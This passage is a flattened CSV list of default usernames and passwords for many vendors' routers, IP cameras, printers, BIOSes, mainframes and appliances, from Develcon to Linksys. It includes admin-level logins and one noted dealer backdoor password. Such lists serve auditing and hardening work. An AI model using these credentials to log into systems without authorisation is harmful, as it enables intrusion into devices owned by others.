Telekom,T-Sinus DSL 130,,HTTP,admin,,Admin,Usuallay also a WirelessLan AP -Develcon,Orbitor Default Console,,,,BRIDGE,Admin, -Develcon,Orbitor Default Console,,,,password,Admin, -Dictaphone,ProLog,,,NETOP,,, -Dictaphone,ProLog,,,NETWORK,NETWORK,, -Dictaphone,ProLog,,,PBX,PBX,, -Digiboard,Portserver 8 & 16,any,,root,dbps,Admin, -Digicom,Michelangelo,,Multi,admin,michelangelo,Admin, -Digicom,Michelangelo,,Multi,user,password,User, -Digicorp,Router,,,,BRIDGE,Admin, -Digicorp,Router,,,,password,Admin, -Digicorp,Viper,,Telnet,,BRIDGE,Admin, -Digicorp,Viper,,Telnet,,password,Admin, 
-Digital,DEC-10,,Multi,2,maintain,Admin, -Dlink,DFE-538TX 10/100 Adapter,Windows 98,,,,, -Dlink,DSL-500,,Multi,admin,admin,Admin, -Dlink,Dl-106 ISDN router,,,,1234,, -Draytek,Vigor 2600,,HTTP,admin,,Admin, -Draytek,Vigor 2900+,,HTTP,admin,admin,Admin, -Draytek,Vigor,all,HTTP,admin,admin,Admin, -Draytek,Vigor3300 series,,Telnet,draytek,1234,Admin, -Drs,IP Camera system,,HTTP,admin,1234,, -Dupont,Digital Water Proofer,,Telnet,root,par0t,Admin, -DynaColor,IP Camera system,,HTTP,admin,1234,, -Dynalink,RTA020,,Multi,admin,admin,Admin, -Dynalink,RTA230,,Multi,admin,admin,Admin, -E-Con,Econ DSL Router,,Router,admin,epicrouter,Admin,DSL Router -E-Tech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin, -E-Tech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin,Password can also be password -E-Tech,Router,RTBR03,HTTP,,admin,Admin,1wan/4ports switch router -E-Tech,Wireless 11Mbps Router Model:WLRT03,,HTTP,,admin,Admin, -E-Tech,Wireless 11Mbps Router,,HTTP,,admin,Admin, -ECI,Any,,,,,Admin, -EMC,DS-4100B,,Console,admin,,Admin,EMC Fiber Switch -Edimax,Broadband Router,Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63,HTTP,admin,1234,Admin, -Edimax,ES-5224RXM,,Multi,admin,123,Admin, -Edimax,EW-7205APL,Firmware release 2.40a-00,Multi,guest,,Admin,http://secunia.com/advisories/11849/ -Edimax,EW-7206APG,,HTTP,admin,1234,Admin, -Edimax,Edimax Fast Ethernet Switch,,HTTP,admin,password,Admin, -Edimax,PS-1203/PS-1205Um/PS-3103,( not applicable ),,admin, OR su@psir,Administration, -Edimax,PS-1208MFG,,,edimax,software01,Admin,for most Edimax HW (?) 
-Efficient Networks,5851 SDSL Router,,Console,,hs7mwxkk,Admin,On some Covad Routers -Efficient Networks,EN 5861,,Telnet,login,admin,Admin, -Efficient Networks,Speedstream 5711,Teledanmark version (only .dk),Console,,4getme2,Admin,for all your TDC router needs -Efficient,,,,,,, -Efficient,5851,,Telnet,login,password,Admin,might be all 5800 series -Efficient,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,This is for access to HTTP admin console. -Efficient,Speedstream DSL,,Telnet,,admin,Admin, -Elron,Firewall,2.5c,,hostname/ ip address,sysadmin,Admin, -Elsa,LANCom Office ISDN Router,800/1000/1100,Telnet,,cisco,Admin, -Enox,PC BIOS,,Console,,xo11nE,Admin, -Enterasys,ANG-1105,unknown,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1 -Enterasys,ANG-1105,unknown,Telnet,,netadmin,Admin, -Enterasys,ANG-1105,unknown,Telnet,,netadmin,Admin,default IP is 192.168.1.1 -Enterasys,Vertical Horizon,ANY,Multi,admin,,Admin,this works in telnet or http -Enterasys,Vertical Horizon,VH-2402S,Multi,tiger,tiger123,Admin, -Entrust,getAccess,4.x and 7.x,Web Admin gui,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat -Epox,PC BIOS,,Console,,central,Admin, -Ericsson ACC,Tigris Platform,All,Multi,public,,Guest, -Ericsson,ACC,,,netman,netman,, -Ericsson,BP250,,HTTP,admin,default,Admin, -Ericsson,Ericsson Acc,,,netman,netman,, -Ericsson,MD110,,Telnet,MD110,help,Admin, -Ericsson,SBG,3.1,,expert,expert,, -Ericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default, -Erpepe,ADSL Router,,Telnet,chochete,tiabuena,Admin, -EverFocus,PowerPlex,EDR1600,Multi,admin,admin,Admin, -EverFocus,PowerPlex,EDR1600,Multi,operator,operator,Admin, -EverFocus,PowerPlex,EDR1600,Multi,supervisor,supervisor,Admin, -Exabyte,Magnum20,,FTP,anonymous,Exabyte,Admin, -Extended Systems,Print Servers,,,admin,extendnet,Admin, -Extreme Networks,All Switches,,Multi,admin,,Admin, -Extreme,All,All,,Admin,,, -F5,Bigip 540,,Multi,root,default,Admin, 
-F5-Networks,BIGIP,,Multi,,,Admin, -Fast-wi,COOG001,,HTTP,admin,admin,Administrator, -Fastwire,Fastwire Bank Transfer,,,fastwire,fw,, -Fastwire,Fastwire Bank Transfer,,,fastwire,fw,, -FiberDriver,N-Base Switches,NH208/NH215/NH2016,Multi,,forgot,Admin, -Flir,IP Camera system,,HTTP,admin,fliradmin,, -Flowpoint,100 IDSN,,Telnet,admin,admin,Admin, -Flowpoint,144, 2200 DSL Routers,ALL,,password,, -Flowpoint,2200 SDSL,,Telnet,admin,admin,Admin, -Flowpoint,2200,,,,Serial Num,, -Flowpoint,40 IDSL,,Telnet,admin,admin,Admin, -Flowpoint,DSL,,Telnet,,password,Admin, -Flowpoint,DSL,2000,Telnet,admin,admin,Admin, -Flowpoint,Flowpoint 2200,,Telnet,,Serial Number,Admin, -Flowpoint,Flowpoint DSL,,,admin,admin,Admin, -Fortinet,Fortigate,,Console,maintainer,admin,Admin, -Fortinet,Fortigate,,Console,maintainer,bcpb+serial#,Admin,serial# has to be in caps -Fortinet,Fortigate,,Telnet,admin,,Admin, -Foscam,IP Camera system,,HTTP,admin,,, -Foundry Networks,IronView Network Manager,Version 01.6.00a (service pack) 0620031754,HTTP,admin,admin,Admin,http://www.foundrynet.com/services/documentation/nms/FEManager_Installation.html -Freetech,BIOS,,Console,,Posterie,Admin, -Freetech,PC BIOS,,Console,,Posterie,Admin, -FritzBox,Wireless,Fon 5010,HTTP,admin,admin,Administrator, -FritzBox,Wireless,Fon 5140,HTTP,admin,admin,Administrator, -FritzBox,Wireless,Fon Annex A,HTTP,admin,admin,Administrator, -FritzBox,Wireless,Fon WLAN 7570,HTTP,admin,fritzfonbox,Administrator, -FritzBox,Wireless,SL WLAN,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 3030,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 3050,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 7113,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 7141,HTTP,admin,admin,Administrator, -FritzBox,Wireless,WLAN 7170,HTTP,admin,admin,Administrator, -Fujitsu Siemens,Fibre Channel SAN storage FX 60,,HTTP,manage,!manage,Admin, -Fujitsu Siemens,Fibre Channel SAN storage FX 60,,Telnet,manage,!manage,Admin, -Fujitsu 
Siemens,Fibre Channel SAN storage,,HTTP,manage,!manage,Admin, -Fujitsu Siemens,Fibre Channel SAN storage,,Telnet,manage,!manage,Admin, -Fujitsu Siemens,Routers,,HTTP,,connect,Admin, -Funk Software,Steel Belted Radius,3.x,Proprietary,admin,radius,Admin, -GVC,e800/rb4,,HTTP,Administrator,admin,Admin, -GVI,IP Camera system,,HTTP,Admin,1234,, -Galacticomm,Major BBS,,Multi,Sysop,Sysop,Admin, -GarrettCom,Magnum Switch,,HTTP,manager,manager,,https://garrettcom-support.belden.com/en/kb/articles/reset-password-or-lost-manager-password-2 -Gateway,Solo,,Multi,,,Admin, -GeoVision,IP Camera system,,HTTP,admin,admin,, -Gericom,Phoenix,,Multi,Administrator,,Admin, -Gigabyte,Gigabyte,,Multi,,,Admin, -GoNET,General Equipment(?),,,fast,adb234,Admin, -Google,Urchin,ANY,Administrator,admin,urchin,Admin Access, -Grandstream,GXP-2000,,HTTP,admin,1234,Admin, -Grandstream,IP Camera system,,HTTP,admin,admin,, -GuardOne,BizGuard,,Multi,n.a,guardone,Admin, -Guru,Wireless ADSL2,,HTTP,admin,admin,Admin, -HC-05 Bluetooth Module,HC-05 for Arduino,,BLUETOOTH,,1234,, -HIKVision,IP Camera system,,HTTP,admin,12345,, -HP,E1200,Network Storage Router,,root,password,admin, -HP,HP 1820-24G-PoE+ J9983A,,HTTP,admin,,Administrator, -HP,HP 2000/3000 MPE/XX,,MULTI,HELLO,OP.OPERATOR,, -HP,HP 2000/3000 MPE/XX,,MULTI,MGR,ITF3000,, -HP,HP 2000/3000 MPE/XX,,MULTI,MGR,NETBASE,, -HP,ISEE,,Multi,admin,isee,Admin, -HP,MSL Series Libraries,,Multi,Factory,56789,Admin,Factory password under Utilities. For all functions unlocked. 
-HP,t5000 Thin Client series,,Console,Administrator,admin,Admin, -Hewlett Packard,Power Manager,3,HTTP,admin,admin,Admin, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HPOFFICE DATA,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPONLY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPP187 SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPWORD PUB,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,LOTUS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,MANAGER,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,MGR,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,SERVICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,FIELD,SUPPORT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,FIELD.SUPPORT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,MANAGER.SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,MGR.SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,HELLO,OP.OPERATOR,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,MAIL,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,MPE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,REMOTE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MAIL,TELESUP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,COGNOS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,ITF3000,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SECURITY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TCH,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TELESUP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGE,VESOFT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CAROLIAN,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CCC,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,CNAS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,COGNOS,, -Hewlett-Packard,HP 
2000/3000 MPE/xx,,Multi,MGR,CONV,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPDESK,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPONLY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP187,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP189,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP196,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,INTX3,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,ITF3000,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,NETBASE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,REGO,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,RJE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,ROBELLE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,SECURITY,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,TELESUP,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,VESOFT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,WORD,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,MGR,XLSERVER,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,COGNOS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,DISC,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SUPPORT,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYSTEM,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,PCUSER,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,RSBCMON,SYS,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,SPOOLMAN,HPOFFICE,, -Hewlett-Packard,HP 2000/3000 MPE/xx,,Multi,WP,HPOFFICE,, -Hewlett-Packard,LaserJet Net Printers,Has Jetdirect,9100,,,User, -Hewlett-Packard,LaserJet Net Printers,Has Jetdirect,Telnet,,,Admin, -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,9100,,,User,Type what you want and close telnet session to printit out -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,FTP,Anonymous,,User,send files to be printed -submit 
-Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,HTTP,,,Admin,HTTP interface -submit -Hewlett-Packard,LaserJet Net Printers,Ones with Jetdirect on them,Telnet,,,Admin,press enter twice if no response in telnet -Hewlett-Packard,Omnibook XE3,,Multi,,,Admin, -Hewlett-Packard,Vectra,,Console,,hewlpack,Admin, -Hewlett-Packard,notebook,,Multi,,,Admin, -Hewlett-Packard,omnibook 4150b,,Multi,,(nessun),Admin, -Hewlett-Packard,omnibook,xe3,Multi,,admin,Admin, -Hewlett-Packard,omnibook6000,m,Multi,,,Admin, -Hewlett-Packard,webmin,0.84,HTTP,admin,hp.com,Admin, -Hitron Technologies,CGN5-AP Router,6.1.8.0.2b6,HTTP,admin,password,Administrator, -Hitron Technologies,CGN5-AP Router,6.1.8.0.2b6,Telnet,msoadmin,kbro-TFM,Administrator,Taiwan Fixed Network Only -Hitron Technologies,CGNV5-MAX Router,6.1.5.0.1b9-MGCP,HTTP,cusadmin,password,Administrator, -Honeywell,IP Camera system,,HTTP,administrator,1234,, -Huawei, 4G wingle, E3531, HTTP, admin,admin,, -Huawei,All Router Models,V200R005C30 - V300R003C10,Multi,admin,Admin@huawei,, -Huawei,All Router Models,V300R019C00 and later versions,Multi,admin,admin@huawei.com,, -Huawei,E960,,,admin,admin,Admin, -Huawei,HG531 v1,,,admin,@HuaweiHgw,admin, -Huawei,Home Gateway HG255s,,Multi,admin,superonline,admin, -Huawei,MT880,,HTTP,admin,admin,Admin, -Huawei,MT880r,,Multi,TMAR#HWMT8007079,,Admin,mpacheco.inimigo.com -Huawei,mt820,V100R006C01B021,HTTP,admin,admin,Admin,Telefonica Colombia ADSL -Hyland Software Inc.,Nuxeo,ANY,HTTP,Administrator,Administrator,Administrator,https://doc.nuxeo.com/nxdoc/authentication-and-user-management/ -IBM,2210,RIP,,def,trade,, -IBM,2628,,Multi,,,Admin, -IBM,3534 F08 Fibre Switch,,Multi,admin,password,Admin, -IBM,3583 Tape Library,,HTTP,admin,secure,Admin, -IBM,390e,,Multi,,admin,Admin, -IBM,600x,,Multi,,admin,Admin, -IBM,8224 HUB,,Multi,vt100,public,Admin,Swap MAC address chip from other 8224 -IBM,8225,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin, -IBM,8239 Token Ring HUB,2.5,Console,,R1QTPS,Utility 
Program, -IBM,A21m,,Multi,,,Admin, -IBM,AIX,,Multi,guest,,User, -IBM,AIX,,Multi,root,ibm,Admin, -IBM,AS/400,,,qpgmr,qpgmr,, -IBM,AS/400,OS/400,,QUSER,QUSER,, -IBM,AS400,,,QSRV,QSRV,, -IBM,Ascend OEM Routers,,Telnet,,ascend,Admin, -IBM,BladeCenter Mgmt Console,,HTTP,USERID,PASSW0RD,Admin, -IBM,DB2,WinNT,,db2admin,db2admin,, -IBM,Directory - Web Administration Tool,5.1,HTTP,superadmin,secret,Admin,Documented in Web Administration Guide -IBM,Hardware Management Console,3,ssh,hscroot,abc123,Admin, -IBM,Hardware Management,3,ssh,hscroot,abc123,Admin, -IBM,IBM,,Multi,,,Admin, -IBM,Infoprint 6700,http://www.phenoelit.de/dpl/dpl.html,Multi,root,,Admin,Also works for older 4400 printers and probably Printronics equivalentsas well. -IBM,LAN Server OS,2.0/2.1/3.0/4.0,,username,password,, -IBM,Lotus Domino Go Web Server (net.commerce edition),ANY ?,,webadmin,webibm,, -IBM,OS/400,,Multi,11111111,11111111,, -IBM,OS/400,,Multi,ibm,password,, -IBM,OS/400,,Multi,ibm,service,, -IBM,OS/400,,Multi,qsecofr,22222222,, -IBM,OS/400,,Multi,qsecofr,qsecofr,, -IBM,OS/400,,Multi,qsrv,qsrv,, -IBM,OS/400,,Multi,qsvr,qsvr,, -IBM,OS/400,,Multi,qsysopr,qsysopr,, -IBM,OS/400,,Multi,secofr,secofr,, -IBM,OS/400,,Multi,sysopr,sysopr,, -IBM,PC BIOS,,Console,,IBM,Admin, -IBM,PC BIOS,,Console,,sertafu,Admin, -IBM,POS CMOS,,Console,ESSEX,,, -IBM,RS/6000,AIX,,root,ibm,, -IBM,Remote Supervisor Adapter (RSA),,HTTP,USERID,PASSW0RD,Admin, -IBM,T20,,Multi,,admin,Admin, -IBM,T42,,HTTP,Administrator,admin,Admin, -IBM,Tivoli,,HTTP,admin,admin,Administrator, -IBM,TotalStorage Enterprise Server,,Multi,storwatch,specialist,Admin, -IBM,VM/CMS,,Multi,$ALOC$,,, -IBM,VM/CMS,,Multi,AP2SVP,,, -IBM,VM/CMS,,Multi,AUTOLOG1,,, -IBM,VM/CMS,,Multi,BATCH1,,, -IBM,VM/CMS,,Multi,CCC,,, -IBM,VM/CMS,,Multi,CMSUSER,,, -IBM,VM/CMS,,Multi,CPRM,,, -IBM,VM/CMS,,Multi,CVIEW,,, -IBM,VM/CMS,,Multi,DEMO1,,, -IBM,VM/CMS,,Multi,DEMO3,,, -IBM,VM/CMS,,Multi,DIRECT,,, -IBM,VM/CMS,,Multi,DISKCNT,,, -IBM,VM/CMS,,Multi,FSFADMIN,,, 
-IBM,VM/CMS,,Multi,FSFTASK2,,, -IBM,VM/CMS,,Multi,IDMS,,, -IBM,VM/CMS,,Multi,IIPS,,, -IBM,VM/CMS,,Multi,ISPVM,,, -IBM,VM/CMS,,Multi,IVPM2,,, -IBM,VM/CMS,,Multi,MOESERV,,, -IBM,VM/CMS,,Multi,OLTSEP,,, -IBM,VM/CMS,,Multi,OPERATNS,,, -IBM,VM/CMS,,Multi,PENG,,, -IBM,VM/CMS,,Multi,PRODBM,,, -IBM,VM/CMS,,Multi,PSFMAINT,,, -IBM,VM/CMS,,Multi,RDM470,,, -IBM,VM/CMS,,Multi,RSCS,,, -IBM,VM/CMS,,Multi,SAVSYS,,, -IBM,VM/CMS,,Multi,SFCNTRL,,, -IBM,VM/CMS,,Multi,SQLDBA,,, -IBM,VM/CMS,,Multi,SYSADMIN,,, -IBM,VM/CMS,,Multi,SYSDUMP1,,, -IBM,VM/CMS,,Multi,SYSWRM,,, -IBM,VM/CMS,,Multi,TEMP,,, -IBM,VM/CMS,,Multi,VASTEST,,, -IBM,VM/CMS,,Multi,VMARCH,,, -IBM,VM/CMS,,Multi,VMASSYS,,, -IBM,VM/CMS,,Multi,VMBSYSAD,,, -IBM,VM/CMS,,Multi,VMTAPE,,, -IBM,VM/CMS,,Multi,VMUTIL,,, -IBM,VM/CMS,,Multi,VSEMAINT,,, -IBM,VM/CMS,,Multi,VTAM,,, -IBM,a20m,,Multi,,admin,Admin, -IBM,ra6000,AIX Unix,,,,, -IBM,switch,8275-217,Telnet,admin,,Admin, -IBM,thinkpad,,Multi,,,Admin, -IMAI,Traffic Shaper,TS-1012,HTTP,,,Admin,default IP 1.2.3.4 -INFOSMART,SOHO ROUTER,,HTTP,admin,0 or 0000,, -INOVA,ONT4BKP (IP clock),all,Telnet,iclock,timely,Admin,Network clock -IOImage,IP Camera system,,HTTP,admin,admin,, -IPX-DDK,IP Camera system,,HTTP,root,Admidmin,, -IQInvision,IP Camera system,,HTTP,root,system,, -IRC,IRC Daemon,,IRC,,FOOBAR,Acess, -IRCXPro,IRCXPro Server,1.0,IRC,admin,password,Admin, -IRIS,,Multi,PDP11,PDP11,User,, -Iammeter,WEM3080,ANY,Device setup and status,admin,admin,Administrator,https://www.iammeter.com/quickstart/wem3080-quickstart -Iammeter,WEM3080T,ANY,Device setup and status,admin,admin,Administrator,https://www.iammeter.com/quickstart/wem3080t-quickstart -Iiawmd,web page,,HTTP,,,User, -Infoblox,INFOBLOX Appliance,,Multi,admin,,Admin, -Informix,Database,,,informix,informix,, -Infosmart,SOHO router,,HTTP,admin,0,Admin, -Integral Technologies,RemoteView,4,Console,Administrator,letmein,Admin, -Integral,RemoteView,4,Console,Administrator,letmein,Admin, -Intel,460T Express Switch,,Multi,,,Admin, 
-Intel,510T,Any,,,admin,, -Intel,All Routers,Any,,,babbit,, -Intel,Express 520T Switch,,Multi,setup,setup,User, -Intel,Express 9520 Router,,Multi,NICONEX,NICONEX,User, -Intel,LanRover VPN Gateway,6.0 >,Multi,,shiva,Admin, -Intel,Shiva,,,Guest,,User, -Intel,Shiva,,,root,,Admin, -Intel,Shiva,,Multi,root,,Admin, -Intel,Wireless AP 2011,2.21,Multi,,Intel,Admin, -Intel,Wireless Gateway,3.x,HTTP,intel,intel,Admin, -Intel,lan rover,6.7,Console,root,admin,Admin, -Intel,netstructure,480t,Telnet,admin,,Admin, -Intel,wireless lan access Point,,,,comcomcom,, -Intel/Shiva,Access Port,All,Telnet,admin,hello,Admin, -Intel/Shiva,Mezza ISDN Router,All,Telnet,admin,hello,Admin, -Intelbras,WRN300,ANY,HTTP,admin,admin,, -Interbase,Interbase Database Server,All,Multi,SYSDBA,masterkey,Admin, -Intermec,Mobile LAN,5.25,Multi,intermec,intermec,Admin, -Intershop,Intershop,4,HTTP,operator,$chwarzepumpe,Admin, -Intersystems,Cache Post-RDMS,,Console,system,sys,Admin,Change immediately -Intex,organizer,,Multi,,,Admin, -Intracom,jetSpeed,520/520i,Multi,admin,admin,Admin,L3x -Inventel,Livebox,,Multi,admin,admin,Admin, -Ipswitch,Whats up Gold,6.0,,admin,admin,Admin, -IronPort,Messaging Gateway Appliance,,Multi,admin,ironport,Admin, -Irongate,NetSurvibox 266,1,HTTP,admin,NetSurvibox,Admin, -Iwill,PC BIOS,,Console,,iwill,Admin, -JAHT,adsl router,AR41/2A,HTTP,admin,epicrouter,Admin, -JD Edwards,WorldVision/OneWorld,All(?),Console,JDE,JDE,Admin/SECOFR, -JDE,WorldVision/OneWorld,,Multi,PRODDTA,PRODDTA,Admin,Owner of database tables and objects -JDS Microprocessing,Hydra 3000,r2.02,Console,hydrasna,,Admin,www.hydrasystems.com/h3kdocs/H3R25C04.pdf -JDS,Hydra 3000,r2.02,Console,hydrasna,,Admin,www.hydrasystems.com/ -JVC,IP Camera system,,HTTP,admin,Model# of camera,, -JetWay,PC BIOS,,Console,,spooml,Admin, -Jetform,Jetform Design,,HTTP,Jetform,,Admin, -Jio,Jio Centrum,ANY,Multi,admin,Jiocentrum,, -Jio,JioFi,ANY,ANY,administrator,administrator,, -JioFi,Web 
UI,ANY,HTTP,administrator,administrator,Administrator,https://jiofilocalhtml.gen.in/ -Juniper,All,Junos 4.4,,root,,, -Juniper,ISG2000,,Multi,netscreen,netscreen,Admin,Just a note - netscreen is now made by Juniper - otherwise no change -Juniper,Netscreen,3.2,Console,serial#,serial#,Admin,Resets to factory settings -KASDA,KD318-MUI,kasda adsl router and modem,Multi,admin,adslroot,Admin, -KASDA,KD318-MUI,kasda adsl router,Multi,admin,adslroot,Admin, -KTI,KS-2260,,Telnet,superuser,123456,special CLI,can be disabled by renaming the regular login name to superuser -KTI,KS2260,,Console,admin,123,Admin, -KTI,KS2600,,Console,admin,123456,Admin, -Kalatel,Calibur DSR-2000e,,Multi,,3477,Admin, -Kalatel,Calibur DSR-2000e,,on-screen menusystem,,8111,restore factory defaults, -Kawa,All,,,,,Admin, -Knox,Arkeia Server,4.2.8-2,,root,,Admin, -Konica Minolta,magicolor 1690MF,,,(non),sysAdmin,Administrator, -Konica Minolta,magicolor 2300 DL,,Multi,,1234,Admin,info from: ftp://ftp.minolta-qms.com/pub/cts/out_going/manuals/2300dl/nic.pdf -Konica Minolta,magicolor 2430DL,All,Multi,,,Admin,Taken from reference manual for product -Konica Minolta,magicolor 5430 DL,,HTTP,admin,administrator,Admin, -Konica/ Minolta,Di 2010f,,HTTP,,0,Admin,Printer configuration interface -Kyocera Printers,2020D,,,,admin00,Admin, -Kyocera,EcoLink,7.2,HTTP,,PASSWORD,Admin, -Kyocera,FS-2020D,,,,admin00,Admin, -Kyocera,Intermate LAN FS Pro 10/100,K82_0371,HTTP,admin,admin,Admin, -Kyocera,Printer,any,,,admin00,, -Kyocera,Telnet Server IB-20/21,,multi,root,root,Admin, -LANCAST,All,,,,,Admin, -LANCOM,IL11,,Multi,,,Admin, -LAXO,IS-194G,1.0a,,admin,admin,admin,192.168.1.254 -LG,Aria iPECS,All,Console,,jannie,maintenance,dealer backdoor password -LG,LAM200E/LAM200R,,Multi,admin,epicrouter,Admin, -LG,LG-N1T1DD1,ANY,HTTP,admin,admin,admin,(Default IP) acquired via DHCP -LGIC,Goldstream,2.5.1,,LR-ISDN,LR-ISDN,Admin, -LOGITECH,LOGITECH MOBILE HEADSET,,BLUETOOTH,,0 or 0000,, -LTS Security,IP Camera system,,HTTP,admin,12345,, 
-LUCENT,M770,,Telnet,super,super,Admin, -Lanier,Digital Imager,LD124c,HTTP,admin,,Admin, -Lanier,LD335,,HTTP,supervisor,,Admin, -Lantronics,Lantronics Terminal Server,,TCP 7000,,access,Admin, -Lantronics,Lantronics Terminal Server,,TCP 7000,,system,Admin, -Lantronix,ETS16P,,Multi,,,Admin,secondary priv. password: system -Lantronix,ETS32PR,,Multi,,,Admin,secondary priv. password: system -Lantronix,ETS422PR,,Multi,,,Admin,secondary priv. password: system -Lantronix,ETS4P,,Multi,,,Admin,secondary priv. password: system -Lantronix,LPS1-T Print Server,j11-16,TCP 7000,any,system,Admin, -Lantronix,LSB4,,TCP 7000,,system,Admin, -Lantronix,Lantronix Terminal,,TCP 7000,,lantronix,Admin, -Lantronix,MSS110/MSSVIA/UDS10,,TCP 7000,,system,Admin, -Lantronix,SCS100,,Multi,,access,Admin,secondary priv. password: system -Lantronix,SCS1620,,Multi,sysadmin,PASS,Admin,9600/N/8/1 XON/XOFF -Lantronix,SCS200,,Multi,,admin,Admin,secondary priv. password: system -Lantronix,SCS3200,,EZWebCon downloaded from ftp. lantronix.com,login,access,Admin,secondary port settings login: root password: system -Lantronix,SCS3200,,EZWebCon,login,access,Admin, -Lantronix,SCS400,,Multi,,admin,Admin,secondary priv. 
password: system -Lantronix,Terminal Server,,TCP 7000,,access,Admin, -Lantronix,Terminal Server,,TCP 7000,,lantronix,Admin, -Laradock,MySQL,,Any,default,secret,non-admin,https://laradock.io/documentation/#use-phpmyadmin -Laradock,MySQL,,Any,root,root,admin,check on your laradock .env -Lenel,OnGuard,ANY,HTTP,admin,admin,admin, -Leviton,47611-GT5,,Multi,admin,leviton,Admin, -LinkSys,WAP11,,Multi,,,Admin, -Linksys,ADSLME3,,,root,orion99,Admin,From Telus ISP (Canada) -Linksys,AG 241 - ADSL2 Gateway with 4-Port Switch,,Multi,admin,admin,Admin, -Linksys,BEFSR41,2,HTTP,,admin,Admin, -Linksys,BEFW11S4,1,HTTP,admin,,Admin, -Linksys,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics,192.168.0.1/docsisdevicestatus.asp -Linksys,DSL,,Telnet,,admin,Admin, -Linksys,EtherFast Cable/DSL ROuter,,Multi,Administrator,admin,Admin, -Linksys,EtherFast Cable/DSL Router,,Multi,Administrator,admin,Admin, -Linksys,Linksys DSL,,,,admin,Admin, -Linksys,Linksys Router DSL/Cable,,HTTP,,admin,Admin, -Linksys,WAG354G,2,HTTP,admin,admin,Admin,Applies to other linksys too -Linksys,WAG54G,,HTTP,admin,admin,Admin, 